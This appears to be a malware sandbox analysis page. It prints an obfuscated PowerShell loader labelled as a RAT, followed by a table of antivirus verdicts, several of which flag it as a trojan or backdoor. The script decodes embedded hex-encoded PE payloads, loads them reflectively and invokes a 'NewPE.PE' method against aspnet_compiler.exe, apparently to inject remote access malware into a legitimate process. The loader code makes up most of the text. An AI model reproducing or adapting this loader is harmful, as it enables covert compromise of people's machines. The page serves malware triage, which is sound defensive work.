Static | ZeroBOX
No static analysis available.
#mY cODER 3LOSH RAT ::::::
Function Here([String] $EYUHSBH3567574JN3532434765675723426869797097957547464356457654686789768970456456464) {
$JN5634646756797897890456745643635353535565676978979678574563523534564675785678 = [System.Collections.Generic.List[Byte]]::new()
for ($i = 0; $i -lt $EYUHSBH3567574JN3532434765675723426869797097957547464356457654686789768970456456464.Length; $i +=8) {
$JN5634646756797897890456745643635353535565676978979678574563523534564675785678.Add([Convert]::ToByte($EYUHSBH3567574JN3532434765675723426869797097957547464356457654686789768970456456464.Substring($i, 8), 2))
return [System.Text.Encoding]::ASCII.GetString($JN5634646756797897890456745643635353535565676978979678574563523534564675785678.ToArray())
function ReturnShellAlosh {
param($Alosh)
$Alosh = $Alosh -split '(..)' | ? { $_ }
ForEach ($J46342423DF34253W245GF3WV52V25322353532V534V65V36B36B3BV63BV3475BN5V6G23C525235CX23C52352V35B21365BV3463V56345V345345364V5764574N74VG543 in $Alosh){
[Convert]::ToInt32($J46342423DF34253W245GF3WV52V25322353532V534V65V36B36B3BV63BV3475BN5V6G23C525235CX23C52352V35B21365BV3463V56345V345345364V5764574N74VG543,16)
$IKGUJ43K2UJ42K3J423KJ423K45G25G35K3J5G34KJG63KJ6G3KJ76G4KJ7G654K7J4J6G32K45F2K5423F4G2342GF4D23HGC4R2R234C32G42J4C21J342H523C456CH252M465C24MH6M23H46525G2F5423G4D12G4D1N432142C5MN3C4M56H356M357643H7636346H356J34H56F34MH6536V3HM6H3M6VH363MV653MVH636VH365M3HV45H235M321V54H235V12M3V5243534M5V3HHMV23V6H23V632M6M236VM2H6VM2HV65M2HV624M6MH24V6V2MH46VMH2462MH4VM26H4VM62H4V6M24HV2M4HM5V3HV54M1H24VMH124VMH124VMH324HVM6345VM76H46VHM7HV4M6HVM436523M52M54MV2V5H2M3VH23MVH5VM23H5V2M5M25MV235 = '4D5@9OOOO3OOOOOOO4OOOOOOFFFFOOOOB8OOOOOOOOOOOOOO4OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO8OOOOOOOOE!FB@OEOOB4O9CD2!B8O!4CCD2!546869732O7O726F67726!6D2O636!6E6E6F742O62652O72756E2O696E2O444F532O6D6F64652EODODO@24OOOOOOOOOOOOOO5O45OOOO4CO!O3OO!3E2!964OOOOOOOOOOOOOOOOEOOOO2O!OBO!O8OOOOF8OOOOOOO@OOOOOOOOOOOO7E!7O!OOOO2OOOOOOO2OO!OOOOOO4OOOOO2OOOOOOOO2OOOOO4OOOOOOOOOOOOOOO4OOOOOOOOOOOOOOOO6OO!OOOOO2OOOOOOOOOOOOO2OO6O85OOOO!OOOOO!OOOOOOOOO!OOOOO!OOOOOOOOOOOOO!OOOOOOOOOOOOOOOOOOOOOOO3O!7O!OO4BOOOOOOOO2OO!OOF
$UI342GFSFZ23F42NFX2JFX4J2H34F2J3F42JH52F5JH2XX5F2JH5F2HJ5F2HJ5F2JH5F2HJ6F23JH6F3H6FH3X6F3H6F2HJ65XFH12X5FHJ14XFHJ13F1313F1HJ34F2F45235F3H6HF36J36F36X5FH3J6536Y35X763673FH252FJ5XF2HX5F2H5F2H5F2H5XF23525XM25HFM25FM25F2MF523H52H352F5XMF2H5HFM52X3MFHX253HFM2X53HFM2XMHF6326XMHF4MFH24X66H4F2XMH64M32FMF634MF36XHM36FXF36MHF36C4 = '4D5@9OOOO3OOOOOOO4OOOOOOFFFFOOOOB8OOOOOOOOOOOOOO4OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO8OOOOOOOOE!FB@OEOOB4O9CD2!B8O!4CCD2!546869732O7O726F67726!6D2O636!6E6E6F742O62652O72756E2O696E2O444F532O6D6F64652EODODO@24OOOOOOOOOOOOOO5O45OOOO4CO!O3OO@9F734EOOOOOOOOOOOOOOOOOEOOO222OOBO!3OOOOO@2OOOOOOO6OOOOOOOOOOOO2EC!OOOOOO2OOOOOOOEOOOOOOOOOOO!OOO2OOOOOOOO2OOOOO4OOOOOOOOOOOOOOO6OOOOOOOOOOOOOOOO2OO!OOOOO2OOOOOOOOOOOOO3OO6O85OOOO!OOOOO!OOOOOOOOO!OOOOO!OOOOOOOOOOOOO!OOOOOOOOOOOOOOOOOOOOOOODCCOOOOO4FOOOOOOOOEOOOOOBEO3OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO!OOOCOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO2OOOOOO8
[byte[]]$NB436457568567923421432433454G546KJ76KL47BHJ45K7H4LK57H5L4KH4LK57H465KL7BH4KL7BH34K6B3B6JL346N6K34N5KLBNKB3 = ReturnShellAlosh $IKGUJ43K2UJ42K3J423KJ423K45G25G35K3J5G34KJG63KJ6G3KJ76G4KJ7G654K7J4J6G32K45F2K5423F4G2342GF4D23HGC4R2R234C32G42J4C21J342H523C456CH252M465C24MH6M23H46525G2F5423G4D12G4D1N432142C5MN3C4M56H356M357643H7636346H356J34H56F34MH6536V3HM6H3M6VH363MV653MVH636VH365M3HV45H235M321V54H235V12M3V5243534M5V3HHMV23V6H23V632M6M236VM2H6VM2HV65M2HV624M6MH24V6V2MH46VMH2462MH4VM26H4VM62H4V6M24HV2M4HM5V3HV54M1H24VMH124VMH124VMH324HVM6345VM76H46VHM7HV4M6HVM436523M52M54MV2V5H2M3VH23MVH5VM23H5V2M5M25MV235
[byte[]]$H2342536JKL63K4J56GL3K4JG653LKH6346HHJKH5LBB242D4D23G4D2G3423N423NG4234N23452N3G42N3G423N432N = ReturnShellAlosh $UI342GFSFZ23F42NFX2JFX4J2H34F2J3F42JH52F5JH2XX5F2JH5F2HJ5F2HJ5F2JH5F2HJ6F23JH6F3H6FH3X6F3H6F2HJ65XFH12X5FHJ14XFHJ13F1313F1HJ34F2F45235F3H6HF36J36F36X5FH3J6536Y35X763673FH252FJ5XF2HX5F2H5F2H5F2H5XF23525XM25HFM25FM25F2MF523H52H352F5XMF2H5HFM52X3MFHX253HFM2X53HFM2XMHF6326XMHF4MFH24X66H4F2XMH64M32FMF634MF36XHM36FXF36MHF36C4
$L5333J3G3GG5KU45G3K4U53453UK535KKKKKUK5KU5K53UK5Y3K5UY345UKK431KU31KU21Y123U13U123UK1Y3U1YK412K412K44KU124124K1U241UK4K4UUK412K414K1UBKKB5KB512KU5B12KU5B12UK5KU5B23U5K23G5235KGKUGKU1G451KU24G1KU4GKU125GK1U5G1KU5G61UK6G21365GU5154K14G1KU4G1KU4G1KU5G1KU5G1UK5G1U2K5G15G12K5U12G4KU124GK1U11 = (Here("^1^^^1^1^1111^^^^11^^1^1^11^^^11^111^1^1^111^1^^^11^^1^1".Replace('^','0')))
$R2323G2DJKU4TG523KU42UK55YTGKUD245GTKU25G32K4U5UK56GK32U5GK2U5G23IL5K2G352KU5G23U5GKU253 = (Here("0^00^00^0^^0^^^00^^^0^^00^^0^^^^0^^0^0^^0^^00^0^".Replace('^','1')))
$S4645687568235SDF23534575686578653252424234536475678568462342341231312434563456467567546 = 'C:\Wi^^nd^^ows\Mi^^cro^^soft.NET\Frame^^work\v4.0.30319\asp^^net_com^^pi^^ler.^^e^^x^^e'
$A45KLHK435435H3K5H4G543HK5G3K5G34KJ53K4J532KJ452JK52KJ342KJ34G23J4G2J3K423KJ4G2KJ34K2J34G2KJ34G2KJ423K52KJ65G23J5G2KJ5GKJ367GKJ47JK67G546JKGJK52KJ34G2KJ4G2KJ4G2JK5G34KJ6G3J67KG3JK6G2K3J5G2KJ3G52JK653GJK6743J7KK4J676474 = [System.Reflection.Assembly]
$ncrx3 = $A45KLHK435435H3K5H4G543HK5G3K5G34KJ53K4J532KJ452JK52KJ342KJ34G23J4G2J3K423KJ4G2KJ34K2J34G2KJ34G2KJ423K52KJ65G23J5G2KJ5GKJ367GKJ47JK67G546JKGJK52KJ34G2KJ4G2KJ4G2JK5G34KJ6G3J67KG3JK6G2K3J5G2KJ3G52JK653GJK6743J7KK4J676474::Load(($H2342536JKL63K4J56GL3K4JG653LKH6346HHJKH5LBB242D4D23G4D2G3423N423NG4234N23452N3G42N3G423N432N))
} catch { }
try
$J4353647567424235475765869823423423E5345634634E6Y74557435E6B66BH346346B34563BN634N = $ncrx3.GetType('N' +'e' +'wP' +'E.PE');
$SE4574R5746723423547644R6JTF567474632453568UIR5 = $J4353647567424235475765869823423423E5345634634E6Y74557435E6B66BH346346B34563BN634N.'GetMethod'($L5333J3G3GG5KU45G3K4U53453UK535KKKKKUK5KU5K53UK5Y3K5UY345UKK431KU31KU21Y123U13U123UK1Y3U1YK412K412K44KU124124K1U241UK4K4UUK412K414K1UBKKB5KB512KU5B12KU5B12UK5KU5B23U5K23G5235KGKUGKU1G451KU24G1KU4GKU125GK1U5G1KU5G61UK6G21365GU5154K14G1KU4G1KU4G1KU5G1KU5G1UK5G1U2K5G15G12K5U12G4KU124GK1U11);
} catch { }
try
$O3452312AWCGHJ4G2H4G2JMGC4GCAK4GAK24JGAKG4KJ24CGA2KJ42JG4KC4K2KGJ4CAKJ4GCCKJ24K2J4JG42GJ42JKG4C2KGJC42JKGC42JKG4C2KJGC4KJ24KGJJKG4G4KJ2KGJ42KGJ442KJC4K2GJCA4KGJCAK4GJAKGJAKKGACKGAC42GKJACKJKJAKGJAC42KAC42KGJCA42KGJAC24KGJACKGAJCGCJKC52JKC5KJAK53GJKGJC5K6GJC4A64SGJSG6J4A = $S4645687568235SDF23534575686578653252424234536475678568462342341231312434563456467567546.Replace("^^", "")
$S3SG4353466785985854684322352354364897689067895346356363746785 = [object[]]($O3452312AWCGHJ4G2H4G2JMGC4GCAK4GAK24JGAKG4KJ24CGA2KJ42JG4KC4K2KGJ4CAKJ4GCCKJ24K2J4JG42GJ42JKG4C2KGJC42JKGC42JKG4C2KJGC4KJ24KGJJKG4G4KJ2KGJ42KGJ442KJC4K2GJCA4KGJCAK4GJAKGJAKKGACKGAC42GKJACKJKJAKGJAC42KAC42KGJCA42KGJAC24KGJACKGAJCGCJKC52JKC5KJAK53GJKGJC5K6GJC4A64SGJSG6J4A, $NB436457568567923421432433454G546KJ76KL47BHJ45K7H4LK57H5L4KH4LK57H465KL7BH4KL7BH34K6B3B6JL346N6K34N5KLBNKB3)
$SE4574R5746723423547644R6JTF567474632453568UIR5.$R2323G2DJKU4TG523KU42UK55YTGKUD245GTKU25G32K4U5UK56GK32U5GK2U5G23IL5K2G352KU5G23U5GKU253.Invoke($null, $S3SG4353466785985854684322352354364897689067895346356363746785)
} catch { }
} catch { }
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb Clean
ClamAV Clean
FireEye Heur.BZC.PZQ.Pantera.140.751818AF
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Heur.BZC.PZQ.Pantera.140.751818AF
Malwarebytes Clean
VIPRE Heur.BZC.PZQ.Pantera.140.751818AF
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Symantec Backdoor.ASync!gm
ESET-NOD32 MSIL/Agent.CFQ
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.PowerShell.Kryptik.gen
BitDefender Heur.BZC.PZQ.Pantera.140.751818AF
NANO-Antivirus Clean
ViRobot HTML.Z.Agent.226446
MicroWorld-eScan Heur.BZC.PZQ.Pantera.140.751818AF
Rising Clean
Sophos Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
CMC Clean
Emsisoft Heur.BZC.PZQ.Pantera.140.751818AF (B)
GData Heur.BZC.PZQ.Pantera.140.751818AF
Varist ABRisk.XPMM-6
Avira Clean
MAX malware (ai score=83)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.PZQ.Pantera.140.751818AF
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Kryptik.gen
Microsoft Trojan:Win32/Znyonm
Google Detected
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
TACHYON Clean
Zoner Clean
Tencent Win32.Trojan.Kryptik.Jajl
Yandex Clean
Ikarus Trojan.MSIL.Agent
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.